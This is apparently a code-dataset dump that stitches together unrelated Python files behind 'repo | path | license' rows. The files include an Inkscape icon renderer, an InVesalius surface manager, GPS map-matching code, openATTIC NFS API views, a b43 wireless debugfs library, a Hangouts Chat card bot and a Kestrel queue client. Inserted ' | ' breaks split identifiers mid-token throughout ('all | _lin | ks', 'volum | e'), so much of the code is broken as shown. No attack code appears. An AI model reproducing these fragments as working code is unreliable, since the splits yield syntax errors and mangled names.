and attrs['inkscape:groupmode'] == 'layer' and attrs['inkscape:label'].startswith('Baseplate')):
self.stack.append(self.LAYER)
self.inside.append(self.LAYER)
self.context = None
self.icon_name = None
self.rects = []
return
elif self.inside[-1] == self.LAYER:
if name == "text" and ('inkscape:label' in attrs) and attrs['inkscape:label'] == 'context':
self.stack.append(self.TEXT)
self.inside.append(self.TEXT)
self.text = 'context'
self.chars = ""
return
elif name == "text" and ('inkscape:label' in attrs) and attrs['inkscape:label'] == 'icon-name':
self.stack.append(self.TEXT)
self.inside.append(self.TEXT)
self.text = 'icon-name'
self.chars = ""
return
elif name == "rect":
self.rects.append(attrs)
self.stack.append(self.OTHER)
def endElement(self, name):
stacked = self.stack.pop()
if self.inside[-1] == stacked:
self.inside.pop()
if stacked == self.TEXT and self.text is not None:
assert self.text in ['context', 'icon-name']
if self.text == 'context':
self.context = self.chars
elif self.text == 'icon-name':
self.icon_name = self.chars
self.text = None
elif stacked == self.LAYER:
assert self.icon_name
assert self.context
if self.filter is not None and not self.icon_name in self.filter:
return
print (self.context, self.icon_name)
for rect in self.rects:
width = rect['width']
height = rect['height']
id = rect['id']
dir = os.path.join(MAINDIR, self.context)
outfile = os.path.join(dir, self.icon_name+'.png')
if not os.path.exists(dir):
os.makedirs(dir)
# Do a time based check!
if self.force or not os.path.exists(outfile):
inkscape_render_rect(self.path, id, outfile)
sys.stdout.write('.')
else:
stat_in = os.stat(self.path)
stat_out = os.stat(outfile)
if stat_in.st_mtime > stat_out.st_mtime:
inkscape_render_rect(self.path, id, outfile)
sys.stdout.write('.')
else:
sys.stdout.write('-')
sys.stdout.flush()
sys.stdout.write('\n')
sys.stdout.flush()
def characters(self, chars):
self.chars += chars.strip()
if len(sys.argv) == 1:
if not os.path.exists(MAINDIR):
os.mkdir(MAINDIR)
print ('Rendering from SVGs in', SRC)
for file in os.listdir(SRC):
if file[-4:] == '.svg':
file = os.path.join(SRC, file)
handler = ContentHandler(file)
xml.sax.parse(open(file), handler)
else:
file = os.path.join(SRC, sys.argv[1] + '.svg')
if len(sys.argv) > 2:
icons = sys.argv[2:]
else:
icons = None
if os.path.exists(os.path.join(file)):
handler = ContentHandler(file, True, filter=icons)
xml.sax.parse(open(file), handler)
else:
print ("Error: No such file", file)
sys.exit(1)
|
anhstudios/swganh | data/scripts/templates/object/tangible/loot/simple_kit/shared_tumble_blender.py | Python | mit | 455 | 0.046154 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPR | OPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/loot/simple_kit/shared_tumble_blender.iff"
result.attribute_template_id = -1
result.stfName("loot_n","tumble_blender")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ## | ##
return result |
fabio-otsuka/invesalius3 | invesalius/data/surface.py | Python | gpl-2.0 | 35,564 | 0.003459 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import multiprocessing
import os
import plistlib
import random
import tempfile
import weakref
import vtk
import wx
from wx.lib.pubsub import pub as Publisher
import invesalius.constants as const
import invesalius.data.imagedata_utils as iu
import invesalius.data.polydata_utils as pu
import invesalius.project as prj
import invesalius.session as ses
import invesalius.data.surface_process as surface_process
import invesalius.utils as utl
import invesalius.data.vtk_utils as vu
from invesalius.data import cy_mesh
# TODO: Verificar ReleaseDataFlagOn and SetSource
class Surface():
"""
Represent both vtkPolyData and associated properties.
"""
general_index = -1
def __init__(self, index=None, name=""):
Surface.general_index += 1
if index is None:
self.index = Surface.general_index
else:
self.index = index
Surface.general_index -= 1
self.polydata = ''
self.colour = ''
self.transparency = const.SURFACE_TRANSPARENCY
self.volume = 0.0
self.area = 0.0
self.is_shown = 1
if not name:
self.name = const.SURFACE_NAME_PATTERN %(self.index+1)
else:
self.name = name
def SavePlist(self, dir_temp, filelist):
filename = 'surface_%d' % self.index
vtp_filename = filename + '.vtp'
vtp_filepath = os.path.join(dir_temp, vtp_filename)
pu.Export(self.polydata, vtp_filepath, bin=True)
filelist[vtp_filepath] = vtp_filename
surface = {'colour': self.colour,
'index': self.index,
'name': self.name,
'polydata': vtp_filename,
'transparency': self.transparency,
'visible': bool(self.is_shown),
'volume': self.volume,
'area': self.area,
}
plist_filename = filename + '.plist'
#plist_filepath = os.path.join(dir_temp, filename + '.plist')
temp_plist = tempfile.mktemp()
plistlib.writePlist(surface, temp_plist)
filelist[temp_plist] = plist_filename
return plist_filename
def OpenPList(self, filename):
sp = plistlib.readPlist(filename)
dirpath = os.path.abspath(os.path.split(filename)[0])
self.index = sp['index']
self.name = sp['name']
self.colour = sp['colour']
self.transparency = sp['transparency']
self.is_shown = sp['visible']
self.volume = sp['volume']
try:
self.area = sp['area']
except KeyError:
self.area = 0.0
self.polydata = pu.Import(os.path.join(dirpath, sp['polydata']))
Surface.general_index = max(Surface.general_index, self.index)
def _set_class_index(self, index):
Surface.general_index = index
# TODO: will be initialized inside control as it is being done?
class SurfaceManager():
"""
Responsible for:
- creating new surfaces;
- managing surfaces' properties;
- removing existing surfaces.
Send pubsub events to other classes:
- GUI: Update progress status
- volume_viewer: Sends surface actors as the are created
"""
def __init__(self):
self.actors_dict = {}
self.last_surface_index = 0
self.__bind_events()
def __bind_events(self):
Publisher.subscribe(self.AddNewActor, 'Create surface')
Publisher.subscribe(self.SetActorTransparency,
'Set surface transparency')
Publisher.subscribe(self.SetActorColour,
'Set surface colour')
Publisher.subscribe(self.OnChangeSurfaceName, 'Change surface name')
Publisher.subscribe(self.OnShowSurface, 'Show surface')
Publisher.subscribe(self.OnExportSurface,'Export surface to file')
Publisher.subscribe(self.OnLoadSurfaceDict, 'Load surface dict')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnSelectSurface, 'Change surface selected')
#----
Publisher.subscribe(self.OnSplitSurface, 'Split surface')
Publisher.subscribe(self.OnLargestSurface,
'Create surface from largest region')
Publisher.subscribe(self.OnSeedSurface, "Create surface from seeds")
Publisher.subscribe(self.OnDuplicate, "Duplicate surfaces")
Publisher.subscribe(self.OnRemove,"Remove surfaces")
Publisher.subscribe(self.UpdateSurfaceInterpolation, 'Update Surface Interpolation')
Publisher.subscribe(self.OnImportSurfaceFile, 'Import surface file')
def OnDuplicate(self, pubsub_evt):
selected_items = pubsub_evt.data
proj = prj.Project()
surface_dict = proj.surface_dict
for index in selected_items:
original_surface = surface_dict[index]
# compute copy name
name = original_surface.name
names_list = [surface_dict[i].name for i in surface_dict.keys()]
new_name = utl.next_copy_name(name, names_list)
# create new mask
self.CreateSurfaceFromPolydata(polydata = original_surface.polydata,
overwrite = False,
name = new_name,
colour = original_surface.colour,
transparency = original_surface.transparency,
volume = original_surface.volum | e,
area = original_surface.area)
def OnRemove(self, pubsub_evt):
selected_items = pubsub_evt.data
proj = prj.Project() |
old_dict = self.actors_dict
new_dict = {}
if selected_items:
for index in selected_items:
proj.RemoveSurface(index)
actor = old_dict[index]
for i in old_dict:
if i < index:
new_dict[i] = old_dict[i]
if i > index:
new_dict[i-1] = old_dict[i]
old_dict = new_dict
Publisher.sendMessage('Remove surface actor from viewer', actor)
self.actors_dict = new_dict
if self.last_surface_index in selected_items:
if self.actors_dict:
self.last_surface_index = 0
else:
self.last_surface_index = None
def OnSeedSurface(self, pubsub_evt):
"""
Create a new surface, based on the last selected surface,
using as reference seeds user add to surface of reference.
"""
points_id_list = pubsub_evt.data
index = self.last_surface_index
proj = prj.Project()
surface = proj.surface_dict[index]
new_polydata = pu.JoinSeedsParts(surface.polydata,
points_id_list)
index = self.CreateSurfaceFromPolydata(new_polydata)
Publisher.sendMessage('Show single surface', (index, True))
#self.Sh |
pedrocamargo/map_matching | map_matching/finding_network_links.py | Python | apache-2.0 | 3,468 | 0.005479 | #-------------------------------------------------------------------------------
# Name: Step 2 in map matching
# Purpose: Finds the links likely corresponding to each GPS ping
#
# Author: Pedro Camargo
#
# Created: 09/04/2017
# Copyright: (c) pcamargo 2017
# Licence: APACHE 2.0
#-------------------------------------------------------------------------------
import glob
import ntpath
import pandas as pd
from shapely.geometry import LineString, Point # Pip install shapely
from parameters import load_parameters
# Somewhat based on http://rexdouglass.com/fast-spatial-joins-in-python-with-a-spatial-index/
def find_network_links(trip, network):
veh_speed = -1
veh_azimuth = -1
poly = []
all | _lin | ks = []
for g, t in enumerate(trip.gps_trace.index):
# Collects all info on a ping
if trip.has_speed:
veh_speed = trip.gps_trace.at[t, 'speed']
if trip.has_azimuth:
veh_azimuth = trip.gps_trace.at[t, 'azimuth']
y = trip.gps_trace.at[t, 'latitude']
x = trip.gps_trace.at[t, 'longitude']
P = (x, y)
# Finds which links are likely to have been used
l = network.idx_links.intersection(P)
P = Point(x,y)
# Loops through them to make sure they are within the buffers
for j in l:
direc = network.links_df.dir[j]
graph_id = network.links_df.graph_ab[j]
if direc < 0:
graph_id = network.links_df.graph_ba[j]
if graph_id not in poly:
if P.within(network.buffers[j]):
if trip.has_azimuth:
azim = network.links_df.azim[j]
if direc < 0:
azim = reverse_azim(azim)
if check_if_inside(veh_azimuth, azim, network.azimuth_tolerance):
poly.append(graph_id)
all_links.append(int(j))
if direc == 0:
azim = reverse_azim(azim)
if check_if_inside(veh_azimuth, azim, network.azimuth_tolerance):
poly.append(network.links_df.graph_ba[j])
else:
poly.append(graph_id)
all_links.append(int(j))
if direc == 0:
poly.append(network.links_df.graph_ba[j])
trip.graph_links = poly
trip.used_links = all_links
def reverse_azim(azim):
if azim > 180:
return azim - 180
else:
return azim + 180
def check_if_inside(azimuth, polygon_azimuth, tolerance):
inside=False
# If checking the tolerance interval will make the angle bleed the [0,360] interval, we have to fix it
#In case the angle is too big
if polygon_azimuth + tolerance > 360:
if polygon_azimuth - tolerance > azimuth:
azimuth += 360
#In case the angle is too small
if polygon_azimuth-tolerance < 0:
polygon_azimuth += 360
if azimuth < 180:
azimuth += 360
if polygon_azimuth - tolerance <= azimuth <= polygon_azimuth + tolerance:
inside = True
# Several data points do NOT have an azimuth associated, so we consider the possibility that all the links are valid
if azimuth == 0:
inside = True
return inside
if __name__ == '__main__':
main()
|
openattic/openattic | backend/ceph_nfs/views/ganesha_mgr_view.py | Python | gpl-2.0 | 4,167 | 0.00144 | # -*- coding: utf-8 -*-
"""
* Copyright (c) 2017 SUSE LLC
*
* openATTIC is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2.
*
* This package is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
"""
import logging
from django.core.exceptions import ValidationError
from rest_framework.decorators import api_view
from rest_framework.response import Response
from deepsea import DeepSea
from ceph_nfs import tasks
try:
from ceph_nfs.cephfs_util import CephFSUtil
import cephfs as libcephfs
except ImportError:
CephFSUtil = None
from ceph_radosgw.rgw_client import RGWClient
from rest_client import RequestException
from ceph.models import CephCluster
from ceph.restapi import FsidContext
logger = logging.getLogger(__name__)
@api_view(['GET'])
def hosts(request):
return Response({'hosts': DeepSea.instance().nfs_get_hosts()})
@api_view(['GET'])
def fsals(request):
res = DeepSea.instance().nfs_get_fsals_available()
if 'CEPH' in res:
if not CephFSUtil:
res = [f for f in res if f != 'CEPH']
else:
cluster = FsidContext(request=request, module_name='ceph_nfs').cluster
try:
if not CephFSUtil.instance(cluster).status():
res = [f for f in res if f != 'CEPH']
except libcephfs.PermissionError:
res = [f for f in res if f != 'CEPH']
if 'RGW' in res:
try:
if not RGWClient.admin_instance().is_service_online():
res = [f for f in res if f != 'RGW']
if not RGWClient.admin_instance().is_system_user():
res = [f for f in res if f != 'RGW']
except (RGWClient.NoCredentialsException, RequestException):
res = [f for f in res if f != 'RGW']
return Response({'fsals': res})
@api_view(['GET'])
def status(request):
return Response(DeepSea.instance().nfs_status_exports())
@api_view(['POST'])
def deploy(request):
if 'host' in request.DATA:
host = request.DATA['host']
my_task = tasks.async_deploy_exports.delay(host)
else:
my_task = tasks.async_deploy_exports.delay()
logger.info("Scheduled deploy of NFS exports: taskqueue_id=%s", my_task.id)
return Response({'taskqueue_id': my_task.id})
@api_view(['POST'])
def stop(request):
if 'host' in request.DATA:
host = request.DATA['host']
my_t | ask = tasks.async_stop_expo | rts.delay(host)
logger.info("Scheduled stop of NFS exports for host=%s: taskqueue_id=%s", host, my_task.id)
else:
my_task = tasks.async_stop_exports.delay()
logger.info("Scheduled stop of NFS exports: taskqueue_id=%s", my_task.id)
return Response({'taskqueue_id': my_task.id})
@api_view(['GET'])
def ls_dir(request):
if 'root_dir' in request.GET:
root = request.GET['root_dir']
else:
root = "/"
if 'depth' in request.GET:
depth = int(request.GET['depth'])
else:
depth = 1
if depth > 5:
logger.warning("Limiting depth to maximum value of 5: input depth=%s", depth)
depth = 5
root = '{}/'.format(root) if not root.endswith('/') else root
try:
cluster = FsidContext(request=request, module_name='ceph_nfs').cluster
paths = CephFSUtil.instance(cluster).get_dir_list(root, depth)
paths = [p[:-1] for p in paths if p != root]
return Response({'paths': paths})
except libcephfs.ObjectNotFound, libcephfs.PermissionError:
return Response({'paths': []})
@api_view(['GET'])
def buckets(request):
if 'userid' not in request.GET:
raise ValidationError('No userid parameter provided')
try:
return Response({'buckets': RGWClient.instance(request.GET['userid']).get_buckets()})
except RequestException as e:
logger.error(e)
return Response({'buckets': []})
|
itsneo1990/sanic_blog | apps/user/__init__.py | Python | mit | 127 | 0 | # -*- coding:utf-8 -*- |
# __author__ = itsneo1990
import sanic
user_bp = sanic.Blueprint("user_blueprint", url_prefix='us | er')
|
FabianKnapp/nexmon | buildtools/b43/debug/libb43.py | Python | gpl-3.0 | 19,793 | 0.03193 | """
# b43 debugging library
#
# Copyright (C) 2008-2010 Michael Buesch <m@bues.ch>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
import re
import hashlib
from tempfile import *
# SHM routing values
B43_SHM_UCODE = 0
B43_SHM_SHARED = 1
B43_SHM_REGS = 2
B43_SHM_IHR = 3
B43_SHM_RCMTA = 4
class B43Exception(Exception):
pass
B43_MMIO_MACCTL = 0x120
B43_MMIO_PSMDEBUG = 0x154
B43_MACCTL_PSM_MACEN = 0x00000001
B43_MACCTL_PSM_RUN = 0x00000002
B43_MACCTL_PSM_JMP0 = 0x00000004
B43_MACCTL_PSM_DEBUG = 0x00002000
class B43PsmDebug:
"""Parse the contents of the PSM-debug register"""
def __init__(self, reg_content):
self.raw = reg_content
return
def getRaw(self):
"""Get the raw PSM-debug register value"""
return self.raw
def getPc(self):
"""Get the microcode program counter"""
return self.raw & 0xFFF
class B43:
"""Hardware access layer. This accesses the hardware through the debugfs interface."""
def __init__(self, phy=None):
debugfs_path = self.__debugfs_find()
# Construct the debugfs b43 path to the device
b43_path = debugfs_path + "/b43/"
if phy:
b43_path += phy
else:
# Get the PHY.
try:
phys = os.listdir(b43_path)
except OSError:
print "Could not find B43's debugfs directory: %s" % b43_path
raise B43Exception
if not phys:
print "Could not find any b43 device"
raise B43Exception
if len(phys) != 1:
print "Found multiple b43 devices."
print "You must call this tool with a phyX parameter to specify a device"
raise B43Exception
phy = phys[0]
b43_path += phy;
# Open the debugfs files
try:
self.f_mmio16read = file(b43_path + "/mmio16read", "r+")
self.f_mmio16write = file(b43_path + "/mmio16write", "w")
self.f_mmio32read = file(b43_path + "/mmio32read", "r+")
self.f_mmio32write = file(b43_path + "/mmio32write", "w")
self.f_shm16read = file(b43_path + "/shm16read", "r+")
self.f_shm16write = file(b43_path + "/shm16write", "w")
self.f_shm32read = file(b43_path + "/shm32read", "r+")
self.f_shm32write = file(b43_path + "/shm32write", "w")
except IOError, e:
print "Could not open debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
self.b43_path = b43_path
return
# Get the debugfs mountpoint.
def __debugfs_find(self):
mtab = file("/etc/mtab").read().splitlines()
regexp = re.compile(r"^[\w\-_]+\s+([\w/\-_]+)\s+debugfs")
path = None
for line in mtab:
m = regexp.match(line)
if m:
path = m.group(1)
break
if not path:
print "Could not find debugfs in /etc/mtab"
raise B43Exception
return path
def read16(self, reg):
"""Do a 16bit MMIO read"""
try:
self.f_mmio16read.seek(0)
self.f_mmio16read.write("0x%X" % reg)
self.f_mmio16read.flush()
self.f_mmio16read.seek(0)
val = self.f_mmio16read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def read32(self, reg):
"""Do a 32bit MMIO read"""
try:
self.f_mmio32read.seek(0)
self.f_mmio32read.write("0x%X" % reg)
self.f_mmio32read.flush()
self.f_mmio32read.seek(0)
val = self.f_mmio32read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def maskSet16(self, reg, mask, set):
"""Do a 16bit MMIO mask-and-set operation"""
try:
mask &= 0xFFFF
set &= 0xFFFF
self.f_mmio16write.seek(0)
self.f_mmio16write.write("0x%X 0x%X 0x%X" % (reg, mask, set))
self.f_mmio16write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def write16(self, reg, value):
"""Do a 16bit MMIO write"""
self.maskSet16(reg, 0, value)
return
def maskSet32(self, reg, mask, set):
"""Do a 32bit MMIO mask-and-set operation"""
try:
mask &= 0xFFFFFFFF
set &= 0xFFFFFFFF
self.f_mmio32write.seek(0)
self.f_mmio32write.write("0x%X 0x%X 0x%X" % (reg, mask, set))
self.f_mmio32write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def write32(self, reg, value):
"""Do a 32bit MMIO write"""
self.maskSet32(reg, 0, value)
return
def shmRead16(self, routing, offset):
"""Do a 16bit SHM read"""
try:
self.f_shm16read.seek(0)
self.f_shm16read.write("0x%X 0x%X" % (routing, offset))
self.f_shm16read.flush()
self.f_shm16read.seek(0)
val = self.f_shm16read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def shmMaskSet16(self, routing, offset, mask, set):
"""Do a 16bit SHM mask-and-set operation"""
try:
mask &= 0xFFFF
set &= 0xFFFF
self.f_shm16write.seek(0)
self.f_shm16write.write("0x%X 0x%X 0x%X 0x%X" % (routing, offset, mask, set))
self.f_shm16write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def shmWrite16(self, routing, offset, value):
"""Do | a 16bit SHM write"""
self.shmMaskSet16(routing, offset, 0, value)
return
def shmRead32(self, routing, offset):
"""Do a 32bit SHM read"""
try:
self.f_shm32read. | seek(0)
self.f_shm32read.write("0x%X 0x%X" % (routing, offset))
self.f_shm32read.flush()
self.f_shm32read.seek(0)
val = self.f_shm32read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def shmMaskSet32(self, routing, offset, mask, set):
"""Do a 32bit SHM mask-and-set operation"""
try:
mask &= 0xFFFFFFFF
set &= 0xFFFFFFFF
self.f_shm32write.seek(0)
self.f_shm32write.write("0x%X 0x%X 0x%X 0x%X" % (routing, offset, mask, set))
self.f_shm32write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def shmWrite32(self, routing, offset, value):
"""Do a 32bit SHM write"""
self.shmMaskSet32(routing, offset, 0, value)
return
def getGprs(self):
"""Returns an array of 64 ints. One for each General Purpose register."""
ret = []
for i in range(0, 64):
val = self.shmRead16(B43_SHM_REGS, i)
ret.append(val)
return ret
def getLinkRegs(self):
"""Returns an array of 4 ints. One for each Link Register."""
ret = []
for i in range(0, 4):
val = self.read16(0x4D0 + (i * 2))
ret.append(val)
return ret
def getOffsetRegs(self):
"""Returns an array of 7 ints. One for each Offset Register."""
ret = []
for i in range(0, 7):
val = self.read16(0x4C0 + (i * 2))
ret.append(val)
return ret
def shmSharedRead(self):
"""Returns a string containing the SHM contents."""
ret = ""
for i in range(0, 4096, 4):
val = self.shmRead32(B43_SHM_SHARED, i)
ret += "%c%c%c%c" % (val & 0xFF,
(val >> 8) & 0xFF,
(val >> 16) & 0xFF,
(val >> 24) & 0xFF)
return ret
def getPsmDebug(self):
"""Read the PSM-debug register and return an instance of B43PsmDebug."""
val = self.read32(B43_MMIO_PSMDEBUG)
return B43PsmDebug(val)
def getPsmConditions(self):
"""This returns the contents of the programmable-PSM-conditions register."""
return self.read16(0x4D8)
def ucodeStop(self):
"""Unconditionally stop the microcode PSM. """
self.maskSet32(B43_MMIO_MACCTL, ~B43_MACCTL_PSM_RUN, 0)
return
def ucodeStart(self):
"""Unconditionally start the microcode PSM. This will restart the
microcode on t |
CraftSpider/CraftBin | Python/utils/interp/__init__.py | Python | apache-2.0 | 210 | 0.004762 | """
An API for registering interactive command line tools, with argument parsing
and event handl | ing
"""
from .commands import Command, GroupMixin, command
from .interpreter import Interpreter, Context
| |
gsuitedevs/hangouts-chat-samples | python/card-bot/main.py | Python | apache-2.0 | 9,379 | 0.000853 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=invalid-name
"""
Hangouts Chat bot that responds to events and messages from a room
synchronously. The bot formats the response using cards,
inserting widgets based upon the user's original input.
"""
import logging
from flask import Flask, render_template, request, json
app = Flask(__name__)
INTERACTIVE_TEXT_BUTTON_ACTION = "doTextButtonAction"
INTERACTIVE_IMAGE_BUTTON_ACTION = "doImageButtonAction"
INTERACTIVE_BUTTON_PARAMETER_KEY = "param_key"
BOT_HEADER = 'Card Bot Python'
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
event_data = request.get_json()
resp = None
# If the bot is removed from the space, it doesn't post a message
# to the space. Instead, log a message showing that the bot was removed.
if event_data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from %s', event_data['space']['name'])
return 'OK'
if event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'ROOM':
resp = {'text': ('Thanks for adding me to {}!'
.format(event_data['space']['name']))}
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'DM':
resp = {'text': ('Thanks for adding me to a DM, {}!'
.format(event_data['user']['displayName']))}
elif event_data['type'] == 'MESSAGE':
resp = create_card_response(event_data['message']['text'])
elif event_data['type'] == 'CARD_CLICKED':
action_name = event_data['action']['actionMethodName']
parameters = event_data['action']['parameters']
resp = respond_to_interactive_card_click(action_name, parameters)
logging.info(resp)
return json.jsonify(resp)
@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
def create_card_response(event_message):
"""Creates a card response based on the message sent in Hangouts Chat.
See the reference for JSON keys and format for cards:
https://developers.google.com/hangouts/chat/reference/message-formats/cards
Args:
eventMessage: the user's message to the bot
"""
response = dict()
cards = list()
widgets = list()
header = None
words = event_message.lower().split()
for word in words:
if word == 'header':
header = {
'header': {
'title': BOT_HEADER,
'subtitle': 'Card header',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
}
elif word == 'textparagraph':
widgets.append({
'textParagraph': {
'text': '<b>This</b> is a <i>text paragraph</i>.'
}
})
elif word == 'keyvalue':
widgets.append({
'keyValue': {
'topLabel': 'KeyValue Widget',
'content': 'This is a KeyValue widget',
'bottomLabel': 'The bottom label',
'icon': 'STAR'
}
})
elif word == 'interactivetextbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'INTERACTIVE BUTTON',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_TEXT_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'interactiveimagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_IMAGE_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'textbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'TEXT BUTTON',
'onClick': {
| 'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'imagebutton':
| widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'image':
widgets.append({
'image': {
'imageUrl': 'https://goo.gl/Bpa3Y5',
'onClick': {
'openLink': {
'url': 'https://developers.google.com'
}
}
}
})
if header is not None:
cards.append(header)
cards.append({'sections': [{'widgets': widgets}]})
response['cards'] = cards
return response
def respond_to_interactive_card_click(action_name, custom_params):
"""Creates a response for when the user clicks on an interactive card.
See the guide for creating interactive cards
https://developers.google.com/hangouts/chat/how-tos/cards-onclick
Args:
action_name: the name of the custom action defined in the original bot response
custom_params: the parameters defined in the original bot response
"""
message = 'You clicked {}'.format(
'a text button' if action_name == INTERACTIVE_TEXT_BUTTON_ACTION
else 'an image button')
original_message = ""
if custom_params[0]['key'] == INTERACTIVE_BUTTON_PARAMETER_KEY:
original_message = custom_params[0]['value']
else:
original_message = '<i>Cannot determine original message</i>'
# If you want to respond to the same room but with a new message,
# change the following value to NEW_MESSAGE.
action_response = 'UPDATE_MESSAGE'
return {
'actionResponse': {
'type': action_res |
shawnsi/bisectdemo | squares.py | Python | mit | 176 | 0.005682 | #!/usr/bin/env python
from __future__ import print_f | unction
import sys
| integer = int(sys.argv[1])
print(integer**2)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
maw/python-kestrel | kestrel.py | Python | mit | 2,224 | 0.008094 | # -*- coding: utf-8 -*-
import memcache
# XXX where best to specify timeout? constructor or various methods?
class KestrelEnqueueException(Exception):
pass
class connection(object):
def __init__(self, s | ervers, queue, reliable=True,
default_timeout=0, fanout_key=None):
if fanout_key == None:
self.__queue = queue
else:
self.__queue = "%s+ | %s" % (queue, fanout_key)
pass
self.__reliable = reliable
if default_timeout == 0:
self.__timeout_suffix = ""
else:
self.__timeout_suffix = "t=%d" % default_timeout
pass
if reliable:
self.dequeue = self.__reliable_read_fn
self.dequeue_finish = self.__reliable_finish_read_fn
self.dequeue_abort = self.__reliable_abort_read_fn
self.enqueue = self.__reliable_write_fn
self.__reliable_read_key = "%s/open/%s" % \
(self.__queue, self.__timeout_suffix)
self.__reliable_close_key = "%s/close" % self.__queue
self.__reliable_abort_key = "%s/abort" % self.__queue
else:
self.dequeue = None # self.__unreliable_read_fn
self.dequeue_finish = None # self.__unreliable_finish_read_fn
self.dequeue_abort = None # self.__unreliable_abort_read_fn
self.enqueue = None
pass
self.__mc = memcache.Client(servers, allow_get_timeouts=True, debug=1)
pass
def __reliable_write_fn(self, value):
ret = self.__mc.set(self.__queue, value)
if ret == 0:
raise KestrelEnqueueException()
return ret
def __reliable_read_fn(self, timeout=0):
# FIXME timeout belongs here, somehow
key = "%s/t=%d" % (self.__queue, timeout)
l = self.__mc.get(key)
return l
def __reliable_finish_read_fn(self):
l = self.__mc.get(self.__reliable_close_key)
pass
def __reliable_abort_read_fn(self):
l = self.__mc.get(self.__reliable_abort_key)
pass
# TODO: write the unreliable equivalents some day
pass
|
calston/tdjango | manage_test.py | Python | mit | 264 | 0.003788 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tdjango.tests.testapp.settings")
from django.core.managem | ent impo | rt execute_from_command_line
execute_from_command_line(sys.argv)
|
OCA/OpenUpgrade | docsource/conf.py | Python | agpl-3.0 | 5,996 | 0.000167 | #
# OpenUpgrade documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 30 10:38:00 2011.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
